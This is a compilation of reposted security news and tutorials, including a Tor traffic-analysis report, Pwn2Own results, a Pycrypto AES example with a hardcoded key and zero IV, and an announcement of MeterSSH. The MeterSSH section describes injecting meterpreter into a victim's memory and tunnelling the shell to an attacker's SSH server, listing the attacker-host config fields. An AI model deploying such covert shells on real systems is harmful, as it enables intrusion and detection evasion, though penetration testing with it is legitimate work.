Stephen currently works out of San Francisco as a consultant performing reverse engineering, exploit development, threat modeling, and penetration testing. Stephen has an MS in information assurance from Norwich University and is a course author and senior instructor for the SANS Institute.
-
[h=2]Linux Mint 17.1 “Rebecca” MATE RC released![/h]
The team is proud to announce the release of Linux Mint 17.1 “Rebecca” MATE RC.
Linux Mint 17.1 Rebecca MATE Edition
Linux Mint 17.1 is a long term support release which will be supported until 2019. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use.
New features at a glance:
- Out of the box support for Compiz
- Update Manager
- Language Settings
- Login Screen
- System Improvements
- Artwork Improvements
- Other Improvements
- Main Components
- LTS Strategy
For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 17.1 MATE“.
Important info:
- Issues with Skype
- DVD Playback with VLC
- Bluetooth
- EFI Support
- Solving freezes with some NVIDIA GeForce GPUs
- Booting with non-PAE CPUs
- Other issues
Make sure to read the “Release Notes” to be aware of important info or known issues related to this release.
System requirements:
- x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors).
- 512 MB RAM (1GB recommended for a comfortable usage).
- 5 GB of disk space (20GB recommended).
- Graphics card capable of 800×600 resolution (1024×768 recommended).
- CD/DVD drive or USB port
Bug reports:
Please report bugs below in the comment section of this blog.
Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the RC and the stable release.
Download: Md5 sum: 32-bit: a6f43b493cdec449e3232317f2b6e301 64-bit: 0609ad34999d7cae3d3689b9390fc05b Torrents: 32-bit 64-bit HTTP Mirrors for the 32-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. 
Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom HTTP Mirrors for the 64-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. 
Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun testing the release candidate! 
Sursa: The Linux Mint Blog » Blog Archive » Linux Mint 17.1 “Rebecca” MATE RC released!
-
Encrypting files with Pycrypto

Pycrypto is the python cryptography toolkit you'll ever need. It supports pretty much everything, it's rather fast and has an understandable interface and documentation. Cryptography, in itself, is rather complicated and hard to understand and implement, and so is the documentation on encrypting files with pycrypto (or pretty much any crypto toolkit/library in the world). Recently, I was tasked with writing code that will encrypt files to be decrypted on a mobile platform - Android and iOS. Both of their documentations are lacking in that department. You can easily find a snippet so that you can encrypt and decrypt a file on the same device, but not something that will work cross-device/cross-platform. That's because some of the details of the encryption algorithms are not mentioned and those are crucial.

ELI5 AES

AES is a block cipher. That means it encrypts/decrypts in blocks of 128 bits. The key used for the [en|de]cryption is 128, 192 or 256 bits. So, this means that your data has to be divisible by 128 bits and your key must be 128, 192 or 256 bits. Pretty tough to meet these requirements considering we're dealing with binary/text files that will be some random length? Well, that's where padding comes in. In order to make the file's length divisible by 128b (16B) we have to pad it. The most used padding scheme is PKCS7: simply append n < 16 bytes to the file with value n to meet the 16B block size. So, the workflow now would be: pad -> encrypt -> decrypt -> unpad. There's one more thing - the IV - which should also be 16B. It's common practice to have this at random and prepend it to the file on every encryption. We'll assume a static IV now for the sake of simplicity. The documentation around the net doesn't mention the IV. Then the crypto system creates it per device, and you'll be stuck wondering how you can decrypt on your phone but not on your desktop.

Enter AES256/CBC/PKCS7

This is the cookie cutter scheme for encryption. It's supported by the mobile OS-es and libraries, it's even the default! Doing this with openssl is easy:

# To Encrypt (-K takes the raw key as hex; -k would treat the string as a passphrase and derive a different key)
openssl enc -aes-256-cbc -K 4C796F4E49706A386E7167357463756B716D57336B4A37504962487466654845 -iv 00000000000000000000000000000000 -in in_file -out out_file
# To Decrypt
openssl enc -d -aes-256-cbc -K 4C796F4E49706A386E7167357463756B716D57336B4A37504962487466654845 -iv 00000000000000000000000000000000 -in in_file -out out_file

In this example, the key is set to LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE (32B/256b, given to openssl as hex) and the IV is set to 16B of zeroes. Openssl pads with PKCS7 by default. Now let's see the example with pycrypto. Assuming we have in_file and out_file already opened (in binary mode):

from Crypto.Cipher import AES

# initialize the encryption
encryption_key = "LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE"
iv = 16 * '\x00'
crypt = AES.new(encryption_key, AES.MODE_CBC, iv)

# keep chunk size large for speed but divisible by 16B
chunksize = 1024

while True:
    chunk = in_file.read(chunksize)
    if len(chunk) == chunksize:
        # We've read a full encryptable chunk with length divisible by 16B
        out_file.write(crypt.encrypt(chunk))
    else:
        # Last (possibly empty) chunk: its length is not guaranteed to be
        # divisible by 16B, so we PKCS7 pad it. This also covers a file whose
        # size is an exact multiple of chunksize: PKCS7 then needs a full
        # block of padding (16 bytes of value 0x10), otherwise the decrypting
        # side cannot tell where the data ends.
        padding_bytes = AES.block_size - len(chunk) % AES.block_size
        # If we're missing 4 bytes, the padding sequence is 04 04 04 04 (hex)
        padded_chunk = chunk + chr(padding_bytes) * padding_bytes
        out_file.write(crypt.encrypt(padded_chunk))
        break

That's it. This should be decryptable with openssl, android crypto, ios crypto library and any device. Just need to know the encryption scheme, the IV and the encryption key. If you really want to make something secure, I suggest you think about making a random IV each time the function is called. Sursa: Encrypting files with Pycrypto
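A fuller version of the same AES/CBC/PKCS7 scheme, written here as an added example (Python 3) and not taken from the original post: streaming PKCS#7 padding that also handles a block-aligned tail, a strict unpadder for the decrypt side (which the post never shows), and file wrappers that prepend a random IV as the post recommends. The pad/unpad/stream functions depend on no cipher library; the two file wrappers assume the pycryptodome package (Crypto.Cipher.AES).

```python
import os

BLOCK_SIZE = 16  # AES block size in bytes


def pkcs7_pad(data, block_size=BLOCK_SIZE):
    """Append n bytes of value n so len(result) is a multiple of block_size.
    Block-aligned input gets a full block of padding: that is what lets the
    decrypting side strip padding unambiguously."""
    n = block_size - (len(data) % block_size)
    return data + bytes([n]) * n


def pkcs7_unpad(data, block_size=BLOCK_SIZE):
    """Strict PKCS#7 unpad: every padding byte is checked, not just the last."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a multiple of the block size")
    n = data[-1]
    if n < 1 or n > block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return data[:-n]


def pad_and_encrypt_stream(in_file, out_file, encrypt, chunksize=1024):
    """Read in_file in chunks, PKCS#7-pad the final chunk and write encrypt()
    of each chunk to out_file. `encrypt` is a stateful CBC encryptor such as
    AES.new(key, AES.MODE_CBC, iv).encrypt. Returns the ciphertext length.
    A file whose size is an exact multiple of chunksize still gets its
    mandatory final padding block (the empty last read is padded)."""
    if chunksize % BLOCK_SIZE:
        raise ValueError("chunksize must be a multiple of the block size")
    written = 0
    while True:
        chunk = in_file.read(chunksize)
        if len(chunk) < chunksize:
            # Short or empty final read: this is the tail, pad it and stop.
            out = encrypt(pkcs7_pad(chunk))
            out_file.write(out)
            return written + len(out)
        out = encrypt(chunk)
        out_file.write(out)
        written += len(out)


def decrypt_and_unpad_stream(in_file, out_file, decrypt, chunksize=1024):
    """Mirror of pad_and_encrypt_stream: decrypt chunk by chunk, always holding
    back the last block so the padding can be stripped from it at EOF."""
    if chunksize % BLOCK_SIZE:
        raise ValueError("chunksize must be a multiple of the block size")
    pending = b""
    written = 0
    while True:
        chunk = in_file.read(chunksize)
        if not chunk:
            break
        plain = pending + decrypt(chunk)
        out, pending = plain[:-BLOCK_SIZE], plain[-BLOCK_SIZE:]
        out_file.write(out)
        written += len(out)
    tail = pkcs7_unpad(pending)  # raises ValueError on corrupt/garbled data
    out_file.write(tail)
    return written + len(tail)


def aes_cbc_encrypt_file(in_path, out_path, key, chunksize=1024):
    """AES/CBC/PKCS7 with a random IV stored as the first 16 bytes of the
    output, as the post recommends instead of a fixed IV. Assumes the
    pycryptodome package (Crypto.Cipher.AES). Returns the IV used."""
    from Crypto.Cipher import AES  # assumption: pycryptodome is installed
    if len(key) not in (16, 24, 32):
        raise ValueError("AES key must be 16, 24 or 32 bytes")
    iv = os.urandom(BLOCK_SIZE)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    with open(in_path, "rb") as fin, open(out_path, "wb") as fout:
        fout.write(iv)
        pad_and_encrypt_stream(fin, fout, cipher.encrypt, chunksize)
    return iv


def aes_cbc_decrypt_file(in_path, out_path, key, chunksize=1024):
    """Reverse of aes_cbc_encrypt_file: read the IV, then decrypt and unpad."""
    from Crypto.Cipher import AES  # assumption: pycryptodome is installed
    with open(in_path, "rb") as fin, open(out_path, "wb") as fout:
        iv = fin.read(BLOCK_SIZE)
        if len(iv) != BLOCK_SIZE:
            raise ValueError("file too short to contain an IV")
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return decrypt_and_unpad_stream(fin, fout, cipher.decrypt, chunksize)
```

A receiver on another platform reads the first 16 bytes as the IV and decrypts the rest with AES/CBC/PKCS7; with the post's fixed all-zero IV, drop the IV prefix and pass the zero IV to AES.new instead.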
-
[h=1]Chainfire Releases CF-Auto-Roots For Nexus Line[/h] Posted November 15, 2014 at 11:09 am by jerdog Benjamin Franklin, the US Statesman from simpler times, gave the famous quote in 1789 that “…in this world nothing can be said to be certain, except death and taxes.” I can’t fault him for not having the forethought to identify that there would be a few more certainties in life, and those would be “Chainfire releasing root for Nexus devices and providing analysis of the state of root on a new Google release.” For those not familiar, XDA Senior Recognized Developer Chainfire has become the preeminent source for information related to root on Android devices as well as analysis of how Google is changing system security on their new Android OS updates. His Google+ posts are often waited on with anticipation rivaling the title of the next Star Wars installment. Ok, so maybe that’s a bit of a stretch – there weren’t any Watch Parties for the Star Wars announcement. With that being said, he recently updated his CF-Auto-Root downloads to include Android 5.0 root for all of the Nexus line: Nexus 4, Nexus 5, Nexus 7 2012, Nexus 7 2013, Nexus 9, and Nexus 10. A few of the key things changed for this release are: The new variants of CFAR have the SuperSU ZIP embedded A second included ZIP (if on Lollipop or newer) patches the current kernel to run SuperSU at boot Current CFARs have SuperSU v2.20 which is not currently available elsewhere and only has CFAR compatibility For more information, make sure you check out the CFAR thread and his G+ stream to stay current on all Lollipop-related news. Sursa: Chainfire Releases CF-Auto-Roots For Nexus Line - XDA Forums
-
81% of Tor users can be de-anonymised by analysing router information, research indicates Martin Anderson, The Stack Friday 14 November, 2014 Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers. Professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching Network Anonymity and Privacy at the Indraprastha Institute of Information Technology in Delhi, has co-published a series of papers over the last six years outlining the attack vector, and claims a 100% ‘decloaking’ success rate under laboratory conditions, and 81.4% in the actual wilds of the Tor network. Chakravarty’s technique [PDF] involves introducing disturbances in the highly-regulated environs of Onion Router protocols using a modified public Tor server running on Linux - hosted at the time at Columbia University. His work on large-scale traffic analysis attacks in the Tor environment has convinced him that a well-resourced organisation could achieve an extremely high capacity to de-anonymise Tor traffic on an ad hoc basis – but also that one would not necessarily need the resources of a nation state to do so, stating that a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. Chakravarty says: “…it is not even essential to be a global adversary to launch such traffic analysis attacks. 
A powerful, yet non-global adversary could use traffic analysis methods […] to determine the various relays participating in a Tor circuit and directly monitor the traffic entering the entry node of the victim connection,” The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification. Tor is susceptible to this kind of traffic analysis because it was designed for low latency. Chakravarty explains: “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various points of the network, linking together otherwise unrelated network connections.” The online section of the research involved identifying ‘victim’ clients in Planetlab locations in Texas, Belgium and Greece, and exercised a variety of techniques and configurations, some involving control of entry and exit nodes, and others which achieved considerable success by only controlling one end or the other. Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. 
The forensic interest in quite how international cybercrime initiative ‘Operation Onymous’ defied Tor’s obfuscating protocols to expose hundreds of ‘dark net’ sites, including infamous online drug warehouse Silk Road 2.0, has led many to conclude that the core approach to deanonymisation of Tor clients depends upon becoming a ‘relay of choice’ – and a default resource when Tor-directed DDOS attacks put ‘amateur’ servers out of service. Sursa: 81% of Tor users can be de-anonymised by analysing router information, research indicates
-
Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event The Samsung Galaxy S5, Apple iPhone 5s and Google Nexus 5 were amongst handsets to be successfully hacked during the Mobile Pwn2Own hacking competition, reports Forbes. The event is an annual competition which offers cash prizes to those that can reveal security weaknesses in handsets. Sponsored by BlackBerry and Google Android, the event offered a total prize pool of $425,000 to those who could hack the handsets, and prizes were offered pretty quickly as just one day into the two-day event, the iPhone 5s, Samsung Galaxy S5, Nexus 5 and Amazon Fire Phone were all successfully hacked. International Business Times has some more details on the hacks of each handset. It reports that the iPhone 5s fell to “a combination of two vulnerabilities” which allowed the attackers to hack it via the Safari browser, achieving a ‘full sandbox escape.’ The Samsung Galaxy S5 and Google Nexus 5, on the other hand, both fell foul of exploits using the NFC chip – this wasn’t an option in the iPhone 5s, which does not have one, though the recently released iPhone 6 has introduced the chip for the first time. The Amazon Fire Phone, which runs a customized version of Android, fell “using a combination of three separate vulnerabilities”. Bad news for iOS and Android phones then, but what of Windows Phone? Well, according to Ars Technica, a single hacker attempted to take on the Lumia 1520, but was rebuffed. The hacker was apparently “able to exfiltrate the cookie database”, but “unable to gain full control of the system.” HP, that runs the event as part of its Zero Day Initiative, will release more detail on the nature of the hacks once the companies have had time to patch the vulnerabilities. Sursa: Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event
-
MeterSSH – Meterpreter over SSH As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines. MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe. MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel. Here we launch our initial meterssh payload: Next we launch monitor.py which monitors for the SSH connection and automatically launches Metasploit for you. Once it detects the SSH connection and shell, it kicks off Metasploit for you: Next, Metasploit is launched and notice that we are tunneling through localhost to the victim machine. There are two files, monitor.py and meterssh.py. monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell. meterssh.py – this is what you would deploy to the victim machine – note that most windows machines won't have Python installed, it's recommended to compile Python with py2exe or pyinstaller. 
Fields you need to edit inside meterssh.py:

user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port – this is the attacker's SSH server
port = "22"

user – this is the user account for the attacker's SSH server (do not use root, does not need root)
password – this is the password for the attacker's SSH server
rhost – this is the attacker's SSH server IP address
port – this is the attacker's SSH server port

Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify. You can download meterssh from our github page: Download MeterSSH from Github By davek|November 14th, 2014 Sursa: https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/
-
+22: x64 binary → x86 Hex-Rays

Plus22 transforms x86_64 executables to be processed with the 32-bit version of Hex-Rays Decompiler. This tool was created in mid-2013 for internal use in More Smoked Leet Chicken, and made public in November 2014 when Hex-Rays x64 finally came out.

Usage

php plus22.php [-va] {x64_binary.bin or listing.asm}

If the file name ends with '.asm', it will be interpreted as an ASM listing. Otherwise, it will be interpreted as an x64 ELF/PE, and disassembled with IDA.
-v be verbose and leave all temporary files
-a AutoNop all lines with errors
You can use _misc\php.exe to run the script. Plus22 is designed to run in a Windows environment, and works well under Wine.

Specifying your IDA path

To decompile and restore types automatically, Plus22 needs to know where IDA is installed. You can add your path to the $idaPaths array right at the top of the script, or have it done for you automatically when Plus22 needs your IDA installation path. Without specifying the IDA path, you can do the following by hand:
- Load binary in IDA64
- View → Unhide all (uncollapse functions)
- File → Produce file → Create ASM file
- php plus22.php mega_binary.asm
- If you're lucky, .obj is created. Load .obj in IDA
- File → Script file... — execute mega_binary+22.idc for correct function types

Files
_misc\php.exe — compatible PHP version from PHP For Windows
_misc\original_instructions.idc — IDA script to manually load original instruction toggler
_misc\functype.db — imported functions type database, parsed from IDA TIL collection
_misc\jwasm.exe — fast Masm-like assembler from JWasm | SourceForge.net
_misc\exporter.idc — ASM listing export helper IDA script
_example\ — Network 300 from ebCTF 2013 Teaser processed with Plus22. This x64 binary uses raw socket API and heavily utilizes BN_* functions from OpenSSL.
Changelog
v0.3
[+] error correction mode: allows to fix ASM source interactively and re-compile right in +22
[+] '-a' command line switch: auto-nop all errors without user interaction
v0.2.3
[+] type matching for float calling convention (XMM registers)
[+] type guessing support for XMM
[+] automatic 64-bit -> 32-bit constant truncation
v0.2.2
[-] removed collapsed function handling
[+] press Alt-Z to toggle between converted and original x64 instructions
v0.2.1
[+] changeable calling convention: now supports windows x64 binaries
[+] automatic main() detection
[.] more compatible data types
[.] variadic arguments expansion
v0.2
[+] type matching for imports
[+] type guessing for internal functions
[+] fully automatic ELF disassembly
v0.1.1
[+] clip_type_helper: automatic calling convention converter
[.] more automatic patches
v0.1
[+] directive and instruction patches
[+] being able to build an x86 binary
[.] collapsed function emulation
Sursa: https://github.com/v0s/plus22
-
A VMware Guest to Host Escape Story
Kostya Kortchinsky
Immunity, Inc.
BlackHat USA 2009, Las Vegas

Why devices?
- I don't have enough low-level system Mojo
- They are common to all VMware products
- They "run" on the Host – vmware-vmx process
- They can be accessed from the guest – through Port I/O or memory-mapped I/O
- They are written in C/C++
- They sometimes parse some complex data!

Download: http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf
-
How leading Tor developers and advocates tried to smear me after I reported their US Government ties By Yasha Levine On November 14, 2014 “I contract for the United States Government to build anonymity technology for them and deploy it.” — Roger Dingledine, cofounder of Tor, 2004 * * * About three months ago, I published an article exploring the deeply conflicted ties between agencies of the U.S. National Security State, and the Tor Network—an online anonymity tool popular among anti-surveillance privacy groups and activists, including Edward Snowden. My article traced the history of Tor and the US military-intelligence apparatus that spawned it—from Tor’s initial development by military researchers in the mid-1990s at the US Naval Laboratory in Washington DC, through its quasi-independent period after it was spun off as a nonprofit in 2004 but continued to receive most of its funding from a variety of government branches: Pentagon, State Department, USAID, Radio Free Asia. My article also revealed that Tor was created not to protect the public from government surveillance, but rather, to cloak the online identity of intelligence agents as they snooped on areas of interest. But in order to do that, Tor had to be released to the public and used by as diverse a group of people as possible: activists, dissidents, journalists, paranoiacs, kiddie porn scum, criminals and even would-be terrorists — the bigger and weirder the crowd, the easier it would be for agents to mix in and hide in plain sight. Finally, I pointed out that Tor was not nearly as secure as many of its proponents claimed. For people with really something to hide from the state, Tor very likely offered the opposite of anonymity: it singled out users for total NSA surveillance, with intel agencies potentially sucking up and recording everything they did online. Recent events have proven yet again that Tor is not as secure as its fans claim, or as its own developers say they hoped. 
All of this information is public, and it’s been out there for quite a while—but mostly in a scattered and fragmented way. As a result, the full story of Tor’s many pitfalls and contradictions has never been widely known by the public. So even people who should know better, and who care about this issue, have been promoting Tor as a grassroots anti-government surveillance tool without questioning or double-checking that story. When people are told about Tor’s roots in intelligence, and its ongoing funding from the Pentagon, they are usually shocked and surprised. So was I. The Tor story needed to be revisited, which I did, assembling all the verifiable facts, tax and financial records; public statements by Tor’s inventors and developers; published academic papers, and so on. Before publishing, we at Pando reached out multiple times to several key Tor people for comment; editors meticulously fact-checked the article before putting it up. One would’ve thought that an article warning about Tor’s little-known dangers and conflicts-of-interest would’ve been greeted by the privacy and anonymity community—that they would be more interested in protecting the public and getting Tor right, than in protecting Tor’s brand. But instead of being welcomed by the privacy community or sparking a discussion about the aspects of Tor that have been swept under the rug, the article was met with a smear campaign. Surprisingly, the smears weren’t waged by the usual fringe anonymous-troll types, but rather by some of the most prominent privacy and anti-surveillance names in the country—top people from groups like the ACLU, Electronic Frontier Foundation, Freedom of the Press Foundation, and Pierre Omidyar’s First Look Media. Curiously, not a single one of these critics disputed the facts in the story. 
There wasn’t a single factual error they could point to; so instead, they took to a range of familiar PR smear tactics—tactics one usually sees used by oil company PR flacks, but not by privacy hacktivists. First, they flooded social media telling anyone who showed interest in my article that they should ignore it; then when that didn’t work and the article caught fire, they tried to discredit it with crude insults, misdirection, and outright lies, even going as far as to claim that I’m funded by the CIA. From my experience, when your article produces bizarre hostile reactions like this it means you’ve hit on something important.

Take Tor developer Andrea Shepard. As soon as my story went live, Shepard responded with a torrent of childish insults, calling me “Pandofilth” and “Yasha the Foul,” a “statist propagandist,” a “fucktard’s fucktard.” Shepard accused me of being funded by spooks, and ranted on and on about the various ways in which she said I had performed sexual favors for a male colleague. She hurled similar childish abuse at anyone she caught commenting positively about my article.

When readers suggested to Shepard that she should instead offer a point-by-point rebuttal of my article, rather than swearing at and insulting anyone who mentioned it, she responded that my article wasn’t worth the effort of rebutting (only insulting), and that I don’t deserve to live:

@Raed667 @headhntr Yasha Levine doesn’t merit that kind of effort. Frankly, he doesn’t merit *oxygen*.
— Andrea (@puellavulnerata) July 18, 2014

Jacob Appelbaum, another Tor developer who crisscrosses the globe promoting it as a tool against government surveillance, had refused my multiple requests for comment when I was working on the article. When it was published, he called my reporting “a bunch of bullshit”, but refused to elaborate with a substantive rebuttal. Instead, Appelbaum made vague suggestions that I was driven by dark and mysterious motives:

@gbelljnr I don’t. I don’t have time for jerks who use that nonsense to service their other agenda. Boring waste of time.
— Jacob Appelbaum (@ioerror) October 26, 2014

Perhaps it’s somewhat understandable that salaried Tor developers like Andrea Shepard and Jacob Appelbaum went on the attack. Shepard is a libertarian (which is why she called me “statist”—a harsh epithet in her libertarian world); Appelbaum is a bit of a celebrity in the anti-surveillance community, having helped set up Wikileaks, and lately being constantly profiled as a rebel-fugitive hiding out in Berlin from his NSA pursuers. Both Appelbaum and Shepard circulate in radical anti-police state circles, and my article pointed out that they earn $100,000-plus annual salaries working for a nonprofit federal government security contractor—a nonprofit that gets at least three-quarters of its annual funding from the Pentagon, State Department, and other federal agencies. In other words, Tor anti-National Security State rebels are living off the largesse of their NatSec State nemesis.

But it wasn’t only Tor employees who were determined to discredit my reporting. Take Jillian York, “Director for International Freedom of Expression” at the Electronic Frontier Foundation, a tech industry lobby group funded by Silicon Valley’s largest corporations. As soon as the story came out, she counseled her 45,000 followers to ignore my story:

@puellavulnerata yeah I just don’t see the news here.
— Jillian C. York (@jilliancyork) July 17, 2014

The reason? Because it was not being shared very much on social media:

@puellavulnerata well, it seems like only 15 or so people have bothered to tweet the article, so…
— Jillian C. York (@jilliancyork) July 17, 2014

(I’m not convinced that social traffic is a meaningful measure of an article’s importance but, for what it’s worth, the piece currently has around 1.5k Twitter shares and a little over 4k Facebook likes.)
Morgan Marquis-Boire, a former Googler who was recently poached by Pierre Omidyar to run security at First Look, called me a loony conspiracy theorist for reporting on Tor’s government funding—but then contradicted himself by arguing that this “conspiracy theory” is a matter of public record. It was a baffling, oxymoronic argument to make—accusing my article of being both a wild conspiracy theory, yet also boring old news that no one should bother reading—but for some reason, Tor defenders thought this self-contradiction made perfect logical sense:

I wish all the @torproject conspiracy theorists would just read the damn website https://t.co/bYo88BNY81
— Morgan Mayhem (@headhntr) July 28, 2014

Pando’s Tor conspiracy piece stops just short of the real truth… That Roger Dingledine is really Senator Palpatine
Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily
— Morgan Mayhem (@headhntr) July 18, 2014

@ggreenwald @torproject they get funding from USG?? “…which houses the NSA.” -> connect the dots sheeple!
— Morgan Mayhem (@headhntr) July 28, 2014

Christopher Soghoian, who works on privacy policies for the ACLU, took the lowest, scummiest road. Soghoian compared my reporting on Tor to the Protocols of the Elders of Zion, a sick anti-Semitic forgery disseminated by the Tsar’s secret police, unleashing waves of deadly pogroms against Jews across the Russian Empire in the early 20th century. As a refugee from the Soviet Union whose family escaped from state sponsored anti-Semitism, I found Soghoian’s comparison to be outrageously offensive and disgusting.

It seems that Tor is developed by the Elders of Zion, and @ioerror is responsible for 9/11.
Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily
Hall of Mirrors: Wikileaks volunteer helped build Tor, was funded by the Pentagon | PandoDaily
— Christopher Soghoian (@csoghoian) August 6, 2014

I tried to confront Soghoian over his disgusting anti-Semitic smear against me:

Last thing I need is for you, @csoghoian, to smear my reporting by comparing to virulent anti-Semitic propaganda.
— Yasha Levine (@yashalevine) August 6, 2014

But the ACLU’s Soghoian brushed it off with snark:

@yashalevine you want to talk about offensive? Look at your Twitter background image. Totally unfair to @RogerDingledine.
— Christopher Soghoian (@csoghoian) August 6, 2014

And mocked me as a mentally ill paranoiac:

@exiledonline Your pal is a conspiracy theorist who sees black helicopters everywhere. Go read his hatchet job against Tor,
— Christopher Soghoian (@csoghoian) August 6, 2014

Only later, after getting his smears out of his system, Soghoian was finally able to formulate something of a critique. It boiled down to this: He did not like my article because it raised questions about Tor’s longstanding financial relationship with the US government’s military-intelligence agencies—which he found irrelevant, allowing only for purely technical critiques as relevant:

